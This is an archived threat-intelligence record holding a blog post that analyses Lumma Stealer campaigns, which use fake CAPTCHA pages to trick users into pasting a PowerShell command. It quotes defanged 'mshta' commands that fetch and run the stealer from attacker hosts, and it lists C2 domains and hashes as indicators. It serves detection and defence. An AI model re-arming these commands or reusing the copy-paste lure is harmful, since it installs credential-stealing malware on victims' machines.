{
	"id": "49993431-32d0-4b02-8452-c081b6f0c27f",
	"created_at": "2026-04-06T01:30:07.49185Z",
	"updated_at": "2026-04-10T03:22:39.461096Z",
	"deleted_at": null,
	"sha1_hash": "804b0761389ffa959cd716b6d4b1c5742065efca",
	"title": "Anatomy of a Lumma Stealer Attack via Fake CAPTCHA Pages - Part 1",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 344597,
	"plain_text": "Anatomy of a Lumma Stealer Attack via Fake CAPTCHA Pages -\r\nPart 1\r\nBy Tonmoy Jitu\r\nPublished: 2024-08-30 · Archived: 2026-04-06 00:45:02 UTC\r\nAs of late August 2024, attackers have been using fraudulent \"human verification\" pages to trick users into\r\nexecuting a malicious PowerShell script. This blog post will explore the full attack vector, detailing how the\r\nmalware is delivered, executed, and the indicators of compromise (IOCs) involved.\r\nLumma Stealer is designed to exfiltrate sensitive information such as passwords, session tokens, cryptocurrency\r\nwallets, and other personal data from infected machines. What makes this attack more dangerous is the deceptive\r\ndelivery method, exploiting users’ trust in CAPTCHA pages and social engineering tactics.\r\nFake CAPTCHA Pages\r\nThe attack begins with unsuspecting users being directed to a fake CAPTCHA page under the guise of human\r\nverification. These CAPTCHA pages mimic legitimate websites but instead instruct users to copy and paste a\r\nPowerShell script into their system's Run window. Upon execution, the script retrieves and executes a malicious\r\nEXE file—Lumma Stealer.\r\nhttps://denwp.com/anatomy-of-a-lumma-stealer/\r\nPage 1 of 9\n\nExecution of Malicious PowerShell Script\r\nThe heart of this attack lies in the copy/paste PowerShell script. By convincing victims to run this script, attackers\r\ngain control over the victim's machine to download and execute the Lumma Stealer malware.\r\nThe PowerShell script fetches a malicious PE32 executable—Lumma Stealer—which is then run on the victim’s\r\nmachine.\r\nExample of the malicious command execution:\r\nhttps://denwp.com/anatomy-of-a-lumma-stealer/\r\nPage 2 of 9\n\nmshta hxxps[:]//propller.b-cdn[.]net/propller\r\nMalware Analysis: Lumma Stealer\r\nFirst, we needed to identify how clicking the CAPTCHA button led to the encoded PowerShell code being copied\r\nto our clipboard. The answer lies within the page's source code. By inspecting the source, we found a JavaScript\r\nsnippet. This code clearly shows that when the verification button is clicked, the encoded code is automatically\r\ncopied to the clipboard.\r\nUsing CyberChef to decrypt the code, we discovered that it invokes a Windows native binary called mshta ,\r\npassing a URL as a parameter.\r\nmshta.exe is a legitimate Windows utility used to execute HTML Applications (HTA) and handle embedded\r\nscripts, such as VBScript or JavaScript. Since it’s a trusted and signed binary by Microsoft, it often bypasses\r\nsecurity filters, making it a prime candidate for exploitation in \"living off the land\" attacks. This technique allows\r\nattackers to execute malicious scripts without raising alarms, as mshta.exe typically won't be flagged by\r\nantivirus or endpoint protection systems.\r\nBy passing a URL as a parameter, the attacker can remotely host malicious scripts or executables that are fetched\r\nand run by mshta , creating a lightweight and flexible attack vector. This enables attackers to download further\r\npayloads, such as malware, without needing to drop any initial files on the victim’s system, helping to evade\r\ndetection.\r\nhttps://denwp.com/anatomy-of-a-lumma-stealer/\r\nPage 3 of 9\n\nThrough dynamic analysis, we mapped the entire attack chain. When the encoded code is executed via the Run\r\ncommand, it triggers a PowerShell session. This PowerShell session then runs mshta , which executes another\r\ncommand to download the payload.\r\nChecking the directory where the payload was downloaded, we found the installer along with a zip file, which\r\nseemed unusual.\r\nC:\\Users\\\u003cusername\u003e\\AppData\\Local\\Temp\\\r\nhttps://denwp.com/anatomy-of-a-lumma-stealer/\r\nPage 4 of 9\n\nUpon inspecting the contents of the zip file, we discovered it contained a legitimate tool but also included\r\nmalicious DLLs. These DLLs are used to install the Lumma Stealer malware.\r\nC2 Domain\r\nWe had Wireshark running in the background and were able to capture the C2 domains from the TCP\r\ntransmissions.\r\ngreetycruthsuo[.]shop\r\nOnce Lumma Stealer is executed on the infected machine, it communicates with command and control (C2)\r\nservers to exfiltrate stolen data. The C2 servers identified in this campaign are:\r\ngreetycruthsuo[.]shop\r\ntibedowqmwo[.]shop\r\nfutureddospzmvq[.]shop\r\nThese servers are critical to the attacker’s ability to collect and manage the stolen information.\r\nIOCs\r\nFake human CAPTCHA pages as of 2024-08-28:\r\nhxxps[:]//ch3[.]dlvideosfre[.]click/human-verify-system[.]html\r\nhxxps[:]//get-verified.b-cdn[.]net/captcha-verify-v5[.]html\r\nhxxps[:]//get-verified2.b-cdn[.]net/captcha-verify-v2[.]html\r\nhxxps[:]//human-check.b-cdn[.]net/verify-captcha-v7[.]html\r\nhttps://denwp.com/anatomy-of-a-lumma-stealer/\r\nPage 5 of 9\n\nhxxps[:]//human-verify02.b-cdn[.]net/captcha-verify-v2[.]html\r\nhxxps[:]//myapt67[.]s3[.]amazonaws[.]com/human-captcha-v1[.]html\r\nhxxps[:]//myapt67[.]s3[.]amazonaws[.]com/human-verify-system[.]html\r\nInfection traffic from fake verification page:\r\nhxxps[:]//myapt67[.]s3[.]amazonaws[.]com/human-captcha-v1[.]html\r\nhxxps[:]//myapt67[.]s3[.]amazonaws[.]com/pgrtmed \u003c-- Lumma Stealer EXE retrieved and run by\r\ncopied/pasted script\r\nhxxps[:]//myapt67[.]s3[.]amazonaws[.]com/pgrt1[.]zip\r\nhxxps[:]//myapt67[.]s3[.]amazonaws[.]com/pgrt2[.]zip\r\nhxxps[:]//iplogger[.]co/Zv0L8[.]zip \u003c-- parked domain, returned small, non malicious PNG image\r\ntibedowqmwo[.]shop \u003c-- HTTPS Lumma Stealer C2 traffic\r\nInfection traffic from fake verification page:\r\nhxxps[:]//myapt67[.]s3[.]amazonaws[.]com/human-verify-system[.]html\r\nhxxps[:]//myapt67[.]s3[.]amazonaws[.]com/pgrtx \u003c-- Lumma Stealer EXE retrieved and run by\r\ncopied/pasted script\r\nhxxps[:]//myapt67[.]s3[.]amazonaws[.]com/pgrt1[.]zip\r\nhxxps[:]//myapt67[.]s3[.]amazonaws[.]com/pgrt2[.]zip\r\nhxxps[:]//iplogger[.]co/Zbg73[.]zip \u003c-- parked domain, returned small, non malicious PNG image\r\ntibedowqmwo[.]shop \u003c-- HTTPS Lumma Stealer C2 traffic\r\nInfection traffic from fake verification page:\r\nhxxps[:]//ch3[.]dlvideosfre[.]click/human-verify-system[.]html\r\nhxxps[:]//verif[.]dlvideosfre[.]click/2ndhsoru \u003c-- Lumma Stealer EXE retrieved and run by copied/pasted\r\nscript\r\nhxxps[:]//verif[.]dlvideosfre[.]click/K1[.]zip\r\nhxxps[:]//verif[.]dlvideosfre[.]click/K2[.]zip\r\nfutureddospzmvq[.]shop \u003c-- HTTPS Lumma Stealer C2 traffic\r\nWindows EXE files for Lumma Stealer:\r\nSHA256 hash: 07b127b0c351547fa8ec4cac6cd5fd68dc8916dc4557ab13909ca95d53478a7d\r\nFile size: 184,056 bytes\r\nFile location: hxxps[:]//myapt67[.]s3[.]amazonaws[.]com/pgrtmed\r\nFile type: PE32 executable (GUI) Intel 80386, for MS Windows\r\nFile description: Windows EXE for Lumma Stealer\r\nRun method: mshta hxxps[:]//myapt67[.]s3[.]amazonaws[.]com/pgrtmed\r\n=====================================================\r\nSHA256 hash: 539574e6af31c459925943267001e2a9d61fb2c592762b5c4dcbedd90155d8a3\r\nFile size: 180,702 bytes\r\nhttps://denwp.com/anatomy-of-a-lumma-stealer/\r\nPage 6 of 9\n\nFile location: hxxps[:]//myapt67[.]s3[.]amazonaws[.]com/pgrtx\r\nFile type: PE32 executable (GUI) Intel 80386, for MS Windows\r\nFile description: Windows EXE for Lumma Stealer\r\nRun method: mshta hxxps[:]//myapt67[.]s3[.]amazonaws[.]com/pgrtx\r\n=====================================================\r\nSHA256 hash: 7d6ee310f1cd4512d140c94a95f0db4e76a7171c6a65f5c483e7f8a08f7efe78\r\nFile size: 201,092 bytes\r\nFile location: hxxps[:]//verif[.]dlvideosfre[.]click/2ndhsoru\r\nFile type: PE32 executable (GUI) Intel 80386, for MS Windows\r\nFile description: Windows EXE for Lumma Stealer\r\nRun method: mshta hxxps[:]//verif[.]dlvideosfre[.]click/2ndhsoru\r\nReference:\r\nUnit42-timely-threat-intel/2024-08-28-IOCs-for-Lumman-Stealer-from-fake-human-captcha-copy-paste-script.txt at main · PaloAltoNetworks/Unit42-timely-threat-intel\r\nA collection of files with indicators supporting social media posts from Palo Alto Network’s Unit 42\r\nteam to disseminate timely threat intelligence. - PaloAltoNetworks/Unit42-timely-threat-intel\r\nhttps://denwp.com/anatomy-of-a-lumma-stealer/\r\nPage 7 of 9\n\nGitHubPaloAltoNetworks\r\nhttps://denwp.com/anatomy-of-a-lumma-stealer/\r\nPage 8 of 9\n\nSource: https://denwp.com/anatomy-of-a-lumma-stealer/\r\nhttps://denwp.com/anatomy-of-a-lumma-stealer/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://denwp.com/anatomy-of-a-lumma-stealer/"
	],
	"report_names": [
		"anatomy-of-a-lumma-stealer"
	],
	"threat_actors": [
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-10T02:00:03.294222Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775439007,
	"ts_updated_at": 1775791359,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/804b0761389ffa959cd716b6d4b1c5742065efca.pdf",
		"text": "https://archive.orkl.eu/804b0761389ffa959cd716b6d4b1c5742065efca.txt",
		"img": "https://archive.orkl.eu/804b0761389ffa959cd716b6d4b1c5742065efca.jpg"
	}
}